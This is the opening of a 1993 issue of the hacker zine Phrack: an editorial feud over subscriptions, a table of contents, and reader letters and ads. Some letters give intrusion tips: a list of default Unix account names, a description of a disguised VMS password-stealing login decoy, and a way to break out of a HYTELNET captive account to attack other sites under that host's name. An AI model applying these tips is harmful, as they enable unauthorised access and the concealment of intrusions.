Phrack Magazine Issue 43
Phrack Magazine Issue 43
Phrack Magazine Issue 43
Issue 43 Index
___________________
P H R A C K 4 3
July 1, 1993
___________________
Well, here it is: Phrack 43. This issue should really piss every security
professional off. Well, actually, none of them should ever see it because
only two people have registered their subscriptions.
But, then again I think we all know that the whole world is FULL of
lying, thieving people who just don't care about other people's
property. No, smarty, not hackers...computer professionals!
CASE 1:
The Computer Emergency Response Team. Bastions of life, liberty and the
pursuit of happiness. CERT had been on the Phrack mailing list
previously, and was sent a copy of 42 (as was everyone) to give them
the opportunity to subscribe. Rather than do the right thing
and let us at Phrack know that they were not interested in paying,
and to take their name off the list, Ed DiHart instead forwarded off
several copies to his cronies.
Luckily for us, Ed is not the best typist, and the mail bounced all the way
back to Phrack. I called Ed and asked him why he would do such a thing,
which was clearly a direct violation of US Copyright Law. Ed claimed
he didn't know of any new rules for Phrack, and that he had always forwarded
off a few copies to his pals. I told Ed that this practice was unacceptable
and that if he wanted to continue to get Phrack he and his pals would all have
to register their subscriptions. Ed said that he did not want to pay
and to take CERT off the list.
A month prior to this Ed had said to me at the Computers, Freedom & Privacy
conference in San Francisco, "Why are YOU here anyway? It sure is IRONIC
that someone whose goal in life was to invade other people's privacy would
be attending a conference on protecting privacy." I walked away from him in
disgust.
While talking to Ed about Phrack I said, "You know Ed, it sure is IRONIC
that an organization such as CERT, whose main goal is to help protect
the property of others would so flagrantly violate US Copyright law and
completely disregard someone's property rights." Man, did that feel great!
CASE 2:
BT Tymnet. Dale Drew, security guru, made the statement on IRC about
Phrack, "I have absolutely no desire to pay for anything having to do with
hackers." Later, someone from Dale's machine at BT Tymnet (opus.tymnet.com)
logged into Len Rose's machine and ftp'd Phrack 42. With prior knowledge
Phrack was not free, he willingly used company property to commit a crime.
At most companies, that is grounds for termination. Luckily for Dale
Tymnet doesn't give a shit. In fact, Dale several times since has gone
back on IRC stating, "People here are Tymnet are kind of upset about
Phrack 42." This just shows that people at Tymnet are just as criminal
as they say hackers are. Since they could care less about MY property,
then why should I care about theirs? Maybe I should print a list of
all Tymnet internal NUIs! Well, two wrongs won't make a right, so I better
not.
I did, however, send email to Dale stating that we were aware of Tymnet's
transgressions and that we may be forced to take legal action. I have
decided to offer BT a sweet deal on a company-wide site license. We
shall see if they take me up on this offer, or continue to steal Phrack.
CASE 3:
Gail Thackeray. A woman sworn by the court to uphold the laws of the
land. This woman had the audacity to tell me that unless I
enforced my copyright, it was worthless. Unless I enforce it. What the
hell does that mean? Am I supposed to raid companies myself and
go dig for evidence that they have stolen my information? Geez...it's
not like I'm Bellcore. Gail's disgusting interpretation of the law,
that unless you are big enough to stand up for yourself then you have
no recourse, is a festering sore on the face of the American Legal system
and I personally am appalled that this woman is allowed to act as
a law enforcement professional.
Oh well, as you can tell I've had a little fun with all this. And I have
effectively proven my point. Security people, corporate professionals,
and law enforcement types are just as unscrupulous and unethical as they
have always claimed that we are.
Only TWO PEOPLE within the computer/legal/security profession have the right
to receive and keep copies of Phrack. Winn Schwartau, and a man at Mitre.
It's amazing that they are the only ones with any scruples, isn't it?
Well, let's get on with the issue. This one is pure, unadulterated evil.
Only the strong will survive this time. We've got Cellular, we've got
Novell, we've got 5e, we've got PHRACK TRIVIA! Get comfortable, grab
your favorite intoxicant, and enjoy.
*NOTES* Some of you will recognize the 5ESS file from the Summer issue of
2600 magazine. This file was sent to both myself and E. Goldstein. I
was told by the author that 2600 was not printing it. Wrong. Well, we
got permission from 2600 to print it here too since its such a good file,
and since I spent like 8 hours dealing with the author correcting
and editing it. In the future gang, if you send something to Phrack AND
to 2600, TELL US BEFOREHAND! The last thing I want to hear is, "Phrack
is plagiarizing 2600...gawd they are so lame." The acronym file, you will
note, is DIFFERENT. Heh.
In addition to the above, you may notice that we were a bit late in
distributing this issue. As many of you saw through the "resubscribe"
blurb sent over the mailing list, Phrack is not going through Stormking.COM
any longer. The struggle to relocate put us into further delays
but I've managed to take care of securing a new distribution site.
We want to thank everyone at Stormking for shipping Phrack out for
so long, and wish them the best in their future endeavors.
-------------------------------------------------------------------------
READ THE FOLLOWING
You are instructed to read this agreement and comply with its
terms and immediately destroy any copies of this publication
existing in your possession (electronic or otherwise) until
such a time as you have fulfilled your registration requirements.
A form to request registration agreements is provided
at the end of this file.
_______________________________________________________________
_________________________________________________________________
Name:_______________________________ Dept:____________________
Company:_______________________________________________________
Address:_______________________________________________________
_______________________________________________________________
City/State/Province:___________________________________________
Country/Postal Code:___________________________________________
Telephone:____________________ Fax:__________________________
Send to:
Phrack Magazine
603 W. 13th #1A-278
Austin, TX 78701
-----------------------------------------------------------------------------
"If you can take the bag off of your own head, then you haven't had
enough nitrous." -- KevinTX
Phrack Magazine
603 W. 13th #1A-278 (Phrack Mailing Address)
Austin, TX 78701
mQCNAiuIr00AAAEEAMPGAJ+tzwSTQBjIz/IXs155El9QW8EPyIcd7NjQ98CRgJNy
ltY43xMKv7HveHKqJC9KqpUYWwvEBLqlZ30H3gjbChXn+suU18K6V1xRvxgy21qi
a4/qpCMxM9acukKOWYMWA0zg+xf3WShwauFWF7btqk7GojnlY1bCD+Ag5Uf1AAUR
tCZQaHJhY2sgTWFnYXppbmUgPHBocmFja0B3ZWxsLnNmLmNhLnVzPg==
=q2KB
-----END PGP PUBLIC KEY BLOCK-----
-= Phrack 43 =-
Table Of Contents
~~~~~~~~~~~~~~~~~
1. Introduction by The Editor 24K
2. Phrack Loopback Part I 38K
3. Phrack Loopback Part II / Editorial 44K
4. Line Noise Part I 39K
5. Line Noise Part II 43K
6. Phrack Pro-Phile on Doctor Who 15K
7. Conference News Part I by Various Sources 53K
8. Conference News Part II by Various Sources 58K
9. How To Hack Blackjack (Part I) by Lex Luthor 52K
10. How To Hack Blackjack (Part II) by Lex Luthor 50K
11. Help for Verifying Novell Security by Phrack Staff 48K
12. My Bust (Part I) by Robert Clark 56K
13. My Bust (Part II) by Robert Clark 55K
14. Playing Hide and Seek, Unix Style by Phrack Accident 31K
15. Physical Access and Theft of PBX Systems by Co/Dec 28K
16. Guide to the 5ESS by Firm G.R.A.S.P. 63K
17. Cellular Info by Madjus (N.O.D.) 47K
18. LODCOM BBS Archive Information 24K
19. LODCOM Sample Messages 52K
20. Step By Step Guide To Stealing a Camaro by Spy Ace 21K
21. Acronyms Part I by Firm G.R.A.S.P. 50K
22. Acronyms Part II by Firm G.R.A.S.P. 51K
23. Acronyms Part III by Firm G.R.A.S.P. 45K
24. Acronyms Part IV by Firm G.R.A.S.P. 52K
25. Acronyms Part V by Firm G.R.A.S.P. 46K
26. International Scene by Various Sources 51K
27. Phrack World News by Datastream Cowboy 24K
Total: 1152K
"The CTIA recommended that the FCC require the microprocessor chip be
difficult to detach from the circuit board in order to prevent its
removal and replacement or reprogramming."
(Cellular Marketing, p. 18, May 1993)
"Damn, and I was hoping to replace this 8051 with a P5! HAHAHAHAHA!"
(Anonymous hacker-type, Tumbled Cellphone Call, 1993)
_______________________________________________________________________________
==Phrack Magazine==
Phrack Loopback
Part I
****************************************************************************
*********************************** M A I L *********************************
Chris,
Recently the EFF sysadmins, Chris Davis and Helen Rose, informed me that
eff.org was using so much of its T-1 bandwidth that UUNET, who supplies our
IUP connection, was charging us an extra $1,000 per month. They did some
investigation at my request. We determined that Phrack traffic alone was
responsible for over 40% of the total bytes transferred from the site over
the past year or so. This is several gigabytes per month. All in all, the
CuD archive, which contains Phrack, CuD, and other publications accounts
for 85% of our total traffic. All of the email to and from EFF, Usenet
traffic, and other FTP (from the EFF archive, the CAF archive, and others)
constitutes about 15%.
I have also asked Chris and Helen to talk to Brendan Kehoe, who actually
maintains the archive, to see whether there is anything we can do to help
find another site for Phrack or make any other arrangement which will
result in less loss of service.
Mitch
------------------------------------------------------------------------------
Mitchell Kapor, Electronic Frontier Foundation
Note permanent new email address for all correspondence as of 6/1/93
[email protected]
[Editor: Well, all things must come to an end. Looks like EFF's
move to Washington is leaving behind lots of bad
memories, and looking forward to a happy life in the hotbed
of American politics. We wish them good luck. We also
encourage everyone to join.........CPSR.
****************************************************************************
****************************************************************************
Have you ever wanted to impress one of those BBS-babes with your astounding
knowledge of board tricks? Well *NOW* you can! Be the life of the party!
Gain and influence friends! Irritate SysOps! Attain the worship and
admiration of your online pals. Searchlight BBS systems (like many other
software packages) have internal strings to display user information in
messages/posts and the like. They are as follows (tested on Searchlight BBS
System v2.25D):
All you gotta do is slam the string somewhere in the middle of a post or
something and the value will be inserted for the reader to see.
Example: Hey there chump, I mean \%K, you better you better UL or log
off of \%S...you leach too damn many files..you got \%M mins
left to upload some new porn GIFs or face bodily harm and
mutilation!.
----------------------------
Have phun!
Inf0rmati0n Surfer (& Dr. Cloakenstein)
SysOp Cranial Manifestations vBBS
[Editor: Ya know, once a LONG LONG time ago, I got on a BBS and
while reading messages noticed that a large amount of
messages seemed to be directed at ME!!# It took me
about 10 minutes to figure it out, but BOY WAS I MAD!
Then I added my own \%U message for the next hapless fool.
:) BIG FUN!]
****************************************************************************
-(/)-(\)-(/)-(\)-(/)-(\)-(/)-(\)-(/)-(\)-(/)-(\)-(/)-(\)-(/)-(\)-(/)-(\)-
SotMESC
SotMESC
PO Box 573
Long Beach, MS 39560
-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-
****************************************************************************
-----------------------------------------------------------------
---------------------------------------------------------------
root
unmountsys
setup
makefsys
sysadm
powerdown
mountfsys
checkfsys
-----------------------------------------------------------------
Well thats all fo' now tune in next time, same Hack-time
same Hack-channel!!!
--
Technomancer
Southwest Netrunner's League
*****************************************************************
****************************************************************************
Dear Phrack,
I was looking through Phrack 42 and noticed the letters about password
stealers. It just so happened that the same day I had gotten extremely
busted for a program which was infinitely more indetectible. Such is life.
I got off pretty well being an innocent looking female so it's no biggie.
Anyway, I deleted the program the same day because all I could think was
"Shit, I'm fucked". I rewrote a new and improved version, and decided to
submit it. The basic advantages of this decoy are that a) there is no
login failure before the user enters his or her account, and b) the
program defines the show users command for the user so that when they
do show users, the fact that they are running out of another account
doesn't register on their screen.
There are a couple holes in this program that you should probably be
aware of. Neither of these can kick the user back into the account that
the program is running from, so that's no problem, but the program can
still be detected. (So basically, don't run it out of your own account...
except for maybe once...to get a new account to run it out of) First, once
the user has logged into their account (out of your program of course) hitting
control_y twice in a row will cause the terminal to inquire if they are
doing this to terminate the session on the remote node. Oops. It's really no
problem though, because most users wouldn't even know what this meant. The
other problem is that, if the user for some strange reason redefines show:
$show == ""
then the show users screen will no longer eliminate the fact that the account
is set host out of another. That's not a big deal either, however, because
not many people would sit around randomly deciding to redefine show.
The reason I was caught was that I (not even knowing the word "hacker"
until about a month ago) was dumb enough to let all my friends know about the
program and how it worked. The word got spread to redefine show, and that's
what happened. The decoy was caught and traced to me. Enough BS...here's the
program. Sorry...no UNIX...just VMS.
Lady Shade
------------------------------------------------
[Editor: Thanks for the letter and program. I wish I could bring
myself to use a VMS and try it out. :) Always happy
to get notice that somewhere out there a female reads
Phrack. By the way, "innocent female" is an oxymoron.]
****************************************************************************
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
Greetings sweet Phrack and Mr. Bloodaxe. Your "loopback reports" is
really cool invention and I (sorry for egoisthic "I") with pleasure
wasting time for his reading ( ex. my playboy time ). But here for
some unknown reason appear equal style, and all loopback remind
something medium between "relations search" [Hello Dear Phrack, I am
security expert of our local area, but when I looked to output of
"last" program (oh,yeah - "last" it is ...), I ocassionaly under -
standed what apparently someone elite hacker penetrated into my
unpassworded account! But how he knew it??? I need to talk
with him! Please mail me at security@...] and "make yourself" [Yep.I
totally wrote program which gets file listing from target vicitim's
home directory in current host. After that I decided to contribute
it for You. I hope this will help. Here is the complete C code. "rx"
permission in target's '$HOME' required.].
Looking similar articles like "... off Geek!" and various reports
which don't reacheds PWN. [CENSORED BY ME].
Resulting from abovewritten reason and I let myself to add some
elite (oops word too complex), some bogus and little deposit to Your
lb. He written in classic plagiarize style.
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
* * *
Good mornin' Ladys and Gentelmen! I hacking and phreaking. I know what
it is horrible (don't read it please - this message to Bart), but I
doing it all the time (today already 3 month). I have not much time to
write, and here is the subject - I broke into one military computer
and stole their mail about new security bug!!! l00k f3r |t:
- - -
DDN & CERT
SPECIAL REPORT*
Sun 3.x,4.1.x login flaw
Description:
The huge security hole was there and waiting! Type:
$ login root
[ no option required ], and You are! All what You need to know its
just root's password, but it (pw), sure, can be easily obtained from
real root, by asking him (root). Ex - "$ talk root"
If you believe that your system has been compromised, contact CERT CC. Call
our hotline 900-FBI-PRIVATE (24 a day,please not in dinner time or in time
of "Silence of the Lamb"), leave Inet address of your system and number of
private credit card.
- - -
* Report not will be printed in cert advisories in this form, becouse FBI
need remove all hints and tips, and make him useless to intruders.
Thanks to gr*k (I can't write his full name for security reasons),roxtar,
y0,Fidelio,2 scotts from Santafe,KL (He not have attitude towards this
mail,but I included him for polite since he reserved tickets for me to
SUMMERCON),ahh,x0d,all zero's (count,bob,nick,etc.) and many others for
hints to me, what this bug really exist (Yep, before I stoled report).
P.S. Yup! If You won't think what I am toady - I wanna say also thanks to TK
and sure Erik Bloodaxe. And also - IF after E911 incident you are more
carefully, feel free to replace "stole" to "got" (when you'll post it), and
do not forget to add "reprinted with permission".
- Sincerely, anonymous.
----------------------------------------------------------------------
*****************************************************************************
- Len Rose
06/6/93
Newsfeeds: We offer both nntp and uucp based newsfeeds , with all domestic
newsgroups, and including all foreign newsgroups.
Pagesat Inc. offers low cost 56k and T1 Internet connections all over the
United States. Since Pagesat is an FCC common carrier, our savings on
leased lines can be passed on to you. For further information, contact
Duane Dubay ([email protected]).
Netsys will NEVER accept more members than our capacity to serve.
****************************************************************************
Mitchell D. Kapor
450 Warren Street
Brookline, MA 02146 Var 324,000
Andrew Hertzfeld
370 Channing Avenue
Palo Alto, CA 94301 12/12/91 5,000
Apple Computer
20525 Mariani Avenue MS:75-61
Cupertino, CA 95014 03/23/92 50,000
Microsoft
c/o William H. Neukom
1 Microsoft Way
Redmond, VA 98052 06/25/92 50,000
David Winer
933 Hermosa Way
Menio Park, CA 94025 01/02/92 5,000
Ed Venture Holdings
c/o Ester Dvson
375 Park Avenue
New York, NY 10152 03/23/92 15,000
Bauman Fund
c/o Patricia Bauman
1731 Connecticut Avenue
Washington, DC 20009-1146 04/16/92 2,500
Capital Cities ABA
c/o Mark MacCarthy
2445 N. Street, NW Suite 48
Washington, DC 20037 05/04/92 1,000
John Gilmore
210 Clayton Street
San Francisco, CA 94117 07/23/91 1,488
08/06/91 100,000
[Editor: Well, hmmm. Tell you guys what: Send Phrack that
much money and we will give up our ideals and move to
a new location, and forget everything about what we
were all about in the beginning. In fact, we will turn
our backs on it. Fair?
****************************************************************************
A1:
1: [email protected]
2: [email protected]
3: [email protected]
4: [email protected]
5: [email protected]
6: [email protected]
7: [email protected]
8: [email protected]
9: [email protected]
10: [email protected]
11: [email protected]
12: [email protected]
13: [email protected]
14: [email protected]
15: [email protected]
NOTES:
#1-#6 remail only, no encryption of headers
#7-#12 support encrypted headers
#15 special - header and message must be encrypted together
#9,#13,#15 introduce larger than average delay (not direct connect)
#14 public key not yet released
#9,#13,#15 running on privately owned machines
======================================================================
A2:
======================================================================
iQCVAgUBLAulOYOA7OpLWtYzAQHLfQP/XDSipOUPctZnqjjTq7+665MWgysE1ex9
lh3Umzk2Q647KyqhoCo8f7nVrieAZxK0HjRFrRQnQCwjTSQrve2eAQ1A5PmJjyiI
Y55E3YIXYmKrQekIHUKaMyATfnhNc6+2MT8mwaWz2kiOTRkun/SlNI3Cv3Qt8Emy
Y6Zv0kk/7rs=
=simY
-----END PGP SIGNATURE-----
[Editor: We suggest that everyone go ahead and get the info file from
soda.berkeley.edu's ftp site. While you are there,
take a look around. Lots of groovy free stuff.]
==Phrack Magazine==
Phrack Loopback
Part II
======================================================================
ToneLoc T-Shirt Offer
======================================================================
The shirt is an extra large, 100% cotton Hanes Beefy-T, silk screened
with four colors on front and eight colors on back.
If you act now, a free copy of the latest release of ToneLoc will be
included with your order! Please specify 3.5" or 5.25" disks.
Send to:
ToneLoc Shirt
12407 Mopac Expwy N #100-264
Austin, TX 78758
Voice Mail (24 hours): 512-314-5460
- Mucho Maas
- Minor Threat
******************************************************************************
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
&& &&&&&&& &&&&& &&&&&&&&&&& &&&&&&&&& &&&&&&&&&&&&&& &&&&&&&&
&& &&&&& &&&&&&&&& &&&&& &&&&& && &&&&&&&& &&&&&&&&&&&&& &&&&&&&
&& &&& &&&&&&&&& &&&& &&&& && &&&&&&& && &&&&&&&& && & &&&&&&
&& & & & &&&&&&&&& &&& & &&& && &&&&&&& && &&&&&&&& && && &&&&&
&& && && && && && &&& && && &&&&&&& && &&&&&&&& && &&& &&&&
&& &&& &&& && &&&&& && &&& && && &&&&&&& && && &&&&& && &&&& &&&
&& &&&&&&& && &&&&& && &&& && && &&&&&&& && && &&&& && &&&&& &&
&& &&&&&&& && &&&&& && && && &&&&&&& && && &&& && &&&&& &&
&& &&&&&&& && &&&&&&&&& &&& && && &&&&&&& && && && && &&&& &&&
&& &&&&&&& && &&&&&&&&& &&& && && && && & & && &&& &&&&
&& &&&&&&& && &&&&&&& &&& && &&&&&&&&&&& && && && && && &&&&&
&& &&&&&&& && &&&&&&&&& &&& && &&&&&&&&&&& && && &&& && & &&&&&&
&& &&&&&&& && &&&&&&&&&&&&&&& &&&&&&&&&&& && &&&&&&&& && &&&&&&&
&& &&&&&&& &&&&&&&&&&&&&&&&&&&&&& &&&&&&&&&&&&&&&&&& && &&&&&&&&
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
S O U T H W E S T
cDc
_ _
((___))
[ x x ]
cDc \ / cDc
(' ')
(U)
Very K-Rad
713-468-5802
No Lame Ratios
Running Baphomet
Sysd00d : Drunkfux
86,400 Seconds A Day
OoOOooOdlez o' T-Files
The Official HoHoCon BBS
New Pimping Tips Every Day
Tonz o' Nifty Ascii Pictures
Talk To Satan Himself.. Live!!
Free 5-Digit Metro K0DEZ For All
d0Pe Gifs Of Gail Thackeray Online
Read Hate Filled Nazi Skinhead Poemz
Home Of K-RAP : The K-Rad Ascii Possee
Learn How To Make Money! Just Ask Byron!
Necropheliacs & Kidporn Kollekt0rz Welcome
Y0 Y0 Y0 Lonely D00dz! We gotz girlie uzerz!
Lots Of Message Bases With Really K-KeWL Names
Is This Whole "Volcano Ad" Thing Stupid Or What?
GNU Warez From The Future! We Have A Time Machine!
I Think We Have One Of Those Big, EL8 Drive Thingies
No Net Access? Submit Your cDc & Phrack Articles Here!
The Only System Authorized By The Debbie Gibson Fan Club
The Neon Knights Did NOT Die, We Just Went Way Underground
This Thing Is Starting To Look Like That Album St0nerzz Like
Mega KooL Games Like Lemonade Stand And Hunt The Wumpus Deluxe
Hey! It's The Mashed Potato Mountain Thing From Close Encounters
Users Include Lots Of Elite Peoplez You See On Shows Like Dateline
That Really Trendy Super High Speed Modem All Those Warez DooDz Have
cDc / CuD / dFx / Neon Knights / NIA / Phrack / uXu / Video Vindicator
Telco / Systems / Networks / Security / Cellular / Satan / Death / K0DEZ
***************************************************************************
Hi there!
As a beginner in Cyberspace & a new reader of Phrack, I just wanna say thiz...
IT'S X-CELLENT DUDES!!!!!.
I only have your latest issue, and I never read previous ones, so this
is maybe old stuff... but I would like to see the Infonet network and
Datapac covered in some of UR articles... let me know if u published something
in recent issues.
LawEnforcer.
(yes, it's an Alias!!!)
****************************************************************************
begin contribution-------------------------------
VMS machines that have captive accounts often have accounts such as HYTELNET.
This is an account which will archie for you, or take you to a few select BBSs
or any of many boring things to do. You simply log in as HYTELNET, there isn't
a password, and go through the menus. Now, that's where the fun begins. If
you use HYTELNET to telnet anywhere, while it is connecting, simply type your
local telnet escape key (something like ^\ or ^]) and then........you have a
telnet prompt. Unfortunately, if you close or disconnect, it will return to
the HYTELNET menus, and you can't open a new connection, since you're already
connected. So, what you do is SPAWN whatever process you want.....you could
SPAWN TELNET or SPAWN FTP or SPAWN anything else for that matter. SPAWN with
no arguments (the shell escape) does not work, however. This works from any
captive account that telnets. So, you can telnet to a VAX that has HYTELNET,
log in as HYTELNET, do what I told you, and then hack to wherever, since the
reports from the target site will show that [email protected] committed
the heinous crimes that you did.
Kaneda
end contribution--------------------------------
[Editor: Kaneda: thanks for that tidbit. Now I'm sure to get grief
on IRC from someone coming from an odd site. :)
Give my regards to Tetsuo. "But some day...we will be"]
****************************************************************************
_ _
((___))
[ x x ] cDc communications
\ / Global Domination Update
(' ') #12 - April 1st, 1993
(U)
Est. 1986
New gNu NEW gnU new GnU nEW gNu neW gnu nEw releases for April, 1993:
_________________________________/Text Files\_________________________________
222: "A Day in the Life of Debbie G1bs0n" by The Madwoman. The pop idol faces
her arch enemy on the fields of ninja combat and in the arms of love.
223: "The B!G Envelope Stuffing Scam" by Hanover Fiste. How to get money.
Make Sally Struthers proud of you.
224: "The Bird" by Obscure Images. Story 'bout a sad guy who laughs at birds.
It's depressing. Oi's a kooky guy.
225: "Tequila Willy's Position Paper" by Reid Fleming and Omega. Unknown to
most, Tequila Willy thew his hat in the ring for the 1992 presidential
election. Here's the paper detailing his positions on all the important
issues. Better luck in '96, eh?
226: "Simple Cryptology" by Dave Ferret. Introductory guide to cryptology
which also includes a good list of other sources to look into.
227: "Big Ol' Heaping Pile of Shit" by Suicidal Maniac. Buncha poems about
lots of things. Wacky.
228: "ISDN: Fucking the Vacuum Cleaner Attachments" by Reid Fleming. Intended
for _Mondo 2000_, this file drops science about everyone's favorite future
phone system.
229: "The Evil Truth About Peter Pan" by Lady Carolin. It's a whole mess of
things you and your puny little mind might not have noticed about this popular
kiddie (hah!) story.
230: "The 2:00 O'Clock Bus" by Tequila Willy and Bambi the Usurper. Geriatric
porn with some doggy flavor.
All the cDc t-files on disk by mail, for convenience sake! Specify
MS-DOS or Apple II format 3.5" disks. $3.00 cash.
cDc stickers! Same design as were flying around at HoHoCon, with the
scary-lookin' cow skull. k00l. Send a SASE and 50 cents for a dozen of
'em (or just send a dollar).
cDc hat! Yeah, get yer very own stylin' black baseball cap embroidered
with the cDc file-header-type logo on the front in white. This isn't the
foam-and-mesh cheap kind of hat; it's a "6-panel" (the hat industry term)
quality deal. Roll hard with the phat cDc gear. $15.00 plus a buck for
postage.
For some snarly techno grooves, send away for the new tape from Green
Bay's finest (and only) technorave sensation, I OPENING! IO-Illumination
Demo Tape (7 songs of joy) - $5.00
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
From: Freeside Orbital Data Network/ATTN:dFx-HoHoCon-cDc/11504 Hughes Road #124
Houston, TX 77089
HOHOCON '92
December 18-20
Allen Park Inn
Houston, Texas
Please make all checks payable to O.I.S. Free cDc sticker with every
order! w0w!
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
From: Bill's Shirt Thing/P.O. Box 53832/Lubbock, TX/79453
AIDS sucks! Order a catalog! Nifty t-shirts that make you happy.
Proceeds go to local AIDS Resource Center. Send a $0.29 stamp for the
cat'.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
From: Teach Me Violence magazine/61 East 8th St./Suite 202/New York, NY 10003
NEW Internet FTP site: zero.cypher.com. This is Drunkfux and Louis Cypher's
chilly-the-most deal. Login as "anonymous" and get all the cDc stuph fast fast
fast.
NEW cDc Mailing list: Get on the ever-dope and slamagnifiterrific cDc mailing
list! Send mail to [email protected] and include some wonderlessly elite message
along the lines of, "ADD ME 2 DA MAILIN LIZT!!@&!"
We're always taking t-file submissions, so if you've got a file and want to
really get it out there, there's no better way than with cDc. Upload text to
The Polka AE, or my Internet address, or send disks or hardcopy to the cDc post
office box in Lubbock, TX.
NEW updated CDCKC0W.TXT file. All the information for sysops to get going
running Factory Direct Outlets. It should be available from wherever you got
this Update.
NEW CDCV9.ZIP is out containing cDc t-files 201-225. Factory Direct Outlet
sysops should get this and put it up on their systems.
See ya in May.
S. Ratte'
cDc/Editor and P|-|Ear13zz |_3@DeRrr
"We're into t-files for the girlies and money."
[Editor: Whew. Any word on those cDc Glow in The Dark Toilet
Seat Covers? I've got my 29.95 ready!]
****************************************************************************
Hey there a few of us use this account and wuld like to get phrack
sent to us here if at all possible... :)
We are all Australians and all read your magazine to death..
a friend of mine runs a board called shred til ya ded which is basically
a hpac and warez assortment... nothing 0 day but definately good for hacking
info... we are in the middle of getting all of your mags online at the moment
you mentioned in phrack 42 that you would like people from other countries
to write pieces about the scene there... well depending on the kind of thing
you want i would be more than happy to give it a go with some mates
thanks
Darkstar
Also, do you know of any sites which have virus listings archived ?
Thanks,
Jon Barber
[Editor: Well, John, Phrack doesn't carry virii info. You might
check around for 40hex. Personally, I think virii
are vastly overrated hype driven onward by McAffee
and other self-serving interests. That is why we
ignore them. (That is also why I don't mention them
when I lecture on computer security...they are no
big thing.)]
****************************************************************************
Ok,
So I was reading Phrack 42's listing for SprintNET nodes... But there was
no information on how to access it..
What are the ACNS For the Sprintnet? Is there a Phrack out that details
use of the SprintNET..
Would appreciate ANY and ALL, as I've never heard of it being used widely
like the Internet, and would like to know how to use it..
Jack Flash...
[Editor: Jack...you kids are spoiled. You and your Internet. Hrumph.
Remember when Arpanet was like a 20 or so Universities and
Contractors, and tied to about 100 bases thru Milnet? No?
Sheesh.
*****************************************************************************
RE: Loop-Back
RF Burns
*****************************************************************************
Hi -
So now I'm hooked. For my thesis I'm writing a user manual for librarians
on the Internet and helping teach a class in telecommunications.
Just wanted to let you phrack-types know you're my heroes and I want to be
a member of the phrack phamily. Can't send any money, though. *:(
[Editor: That's really great! Usually profs are terribly anal about
anything regarding Phrack and/or hacking. You are very
lucky to have had such an instructor. Congrats on the
class and good luck with your thesis!]
****************************************************************************
Hi!
I was just glancing through Phrack #42, and read the portion
that sez that all computer professionals (essentially) have to
delete this and even old copies of Phrack.
Coupla questions: I'm a Network Administrator for a University,
do I have to comply? It's not like I am a thug from Bellcore or
anything like that. Although one of the things I am concerned with,
professionally, is the security of our systems, I am no Cliff Stoll.
If I were to catch an unauthorized visitor, I would give him the boot,
not chase him down with prosecution in mind.
I have, of course, deleted all my old Phracks as well as #42,
but I would like to be able to re-snarf them. Let me know...
Thanks!
Dan Marner
*****************************************************************************
Hey,
I need to get in touch with some Macintosh phreakers. Know any?
Anyway, are there any good war dialers or scanners out there for
Macintosh? I need something that picks up PBXs and VMBs as well as
Carriers.
Thanx in advance...
*****************************************************************************
Hello! I was just wondering if you knew of any FidoNet site that carries
back issues of phrack. The main reason behind this, as my link through the
Internet is basically through a FidoNet-type network and I am unable to ftp
files. Any help would be appreciated!
Thanks!
Jason K
****************************************************************************
Can you give me the email address for the 2600 Magazine or
whomever the person in charge.
I've no idea how to contact them, so that's why I'm asking you.
Thanks,
MJS
[Editor: 2600 magazine can be reached at [email protected]
To subscribe send $21 to 2600 Subscriptions, P.O. Box 752,
Middle Island, NY, 11953-0752.
To submit articles write to 2600 Editorial Dept., P.O. Box 99,
Middle Island, NY, 11953-0099.
****************************************************************************
Do you know if there has been a set date and place for the next HoHoCon?
Best Regards,
Mayon
[Editor: Actually, it's looking more and more like HoHoCon will
be December 17, 18, 19 in Austin, TX. It may still
be in Houston, but methinks the Big H has had about enough
of dFx. We'll let you know when we know for sure.]
****************************************************************************
Reporter for major metro paper is interested in help finding out anything
there is to find on four prominent people who have volunteered to have their
privacy breached.
Financial fundamentals. Lives of crime. Aches and pains. How rich they are,
where they vacation, who they socialize with. You name it, we're interested in
seeing if it's out there.
All for a good cause.
If you're willing to advise this computer-ignorant reporter, or dig in and
get the dope on these volunteers, please contact him at [email protected]
Or call at 617-929-3342.
Help especially appreciated from anyone in the BOSTON area.
Soon.
Thanks.
****************************************************************************
Hey there...
I don't know if this will get to Dispater or to the new editor. Since the
change in editorship, the proper way to contact Phrack has become sort of a
mystery. (The new address wasn't included in Phrack 31.)
Anyway, I'm writing to bitch about the quality of #31. I've got two main beefs:
1. The article about fake-mail was GREAT until it turned into a "how-to"
primer on using the info given to cause damage. That is exactly the
kind of thing that will end up getting you sued. I have some legal
background, and I'm pretty sure that the author of that article and
possibly even Phrack itself and its editors are now open to a damn
good argument for tortuous negligence if anyone follows the instructions
and damages someone on Compuserve, etc.
The argument will go something like, "Phrack set into motion a chain of
events that led to my client being damaged." You guys should have
just given the info, and left off the moronic ways to abuse it.
Point is, you have opened yourselves up to get sued and lose EASILY.
As much as I've enjoyed reading Phrack over the years, if this new
staff continues in this manner, I'll be stuck with back-issues.
Cyber (305)
-------------------------------------------------------------------------
To find out more about the anon service, send mail to [email protected].
Due to the double-blind system, any replies to this message will be anonymized,
and an anonymous id will be allocated automatically. You have been warned.
Please report any problems, inappropriate use etc. to [email protected].
*IMPORTANT server security update*, mail to [email protected] for details.
[Editor: I think you meant 41, not 31. But to answer your points:
****************************************************************************
Dear Sir/Madam,
[Editor: Its "SIR" hehe. Sir Bloodaxe. In any case, if anyone would
care to draft up this modification to su and send it in
I'll print it in the next issue's line noise.]
****************************************************************************
